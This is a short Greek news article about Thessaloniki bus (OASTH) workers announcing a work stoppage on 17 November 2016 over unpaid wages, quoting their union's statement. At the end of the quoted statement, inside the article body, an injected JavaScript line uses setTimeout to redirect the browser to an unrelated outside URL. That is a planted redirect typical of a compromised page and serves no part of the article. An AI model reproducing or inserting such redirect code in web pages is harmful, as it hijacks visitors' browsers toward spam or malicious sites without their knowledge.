Επίσχεση στον ΟΑΣΘ την Πέμπτη αν δεν καταβληθούν τα δεδουλευμένα

0
5

 

Σε επίσχεση εργασίας θα προχωρήσουν οι εργαζόμενοι στον ΟΑΣΘ την Πέμπτη αν δεν τους καταβληθούν τα δεδουλευμένα τους σύμφωνα με ανακοίνωση που εξέδωσαν.

«Οι εργαζόμενοι στην Αστική Συγκοινωνία Θεσσαλονίκης, πρόσφατα είχαμε αναγκασθεί να προβούμε σε επίσχεση εργασίας για τη μη έγκαιρη καταβολή των μισθών μας. Η Επίσχεση αυτή κρίθηκε από το Δικαστήριο νόμιμη με αποτέλεσμα να καταβληθούν εν μέρει οι οφειλόμενοι μισθοί (αφήνοντας εκκρεμότητα ενός μηνός) και με την υπόσχεση ότι οι μισθοί καταβάλλονται εγκαίρως.

Παρόλο που δεν καταβλήθηκαν οι οφειλόμενοι μισθοί στο σύνολό τους, οι εργαζόμενοι σεβόμενοι το επιβατικό κοινό της Θεσσαλονίκης αναστείλαμε την επίσχεση εργασίας».

«Σήμερα, 15 Νοέμβρη, βρισκόμαστε στη δυσάρεστη θέση να ανακοινώσουμε ότι ο ΟΑΣΘ δεν καταβάλλει τους οφειλόμενους μισθούς. Το Διοικητικό Συμβούλιο του Συνδικάτου σε συνεδρίαση αποφάσισε επίσχεση εργασίας- από την προσεχή Πέμπτη 17 Νοέμβρη 2016 απαιτώντας την καταβολή των δεδουλευμένων από τον ΟΑΣΘ» αναφέρεται στην ανακοίνωση των εργαζομένων. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here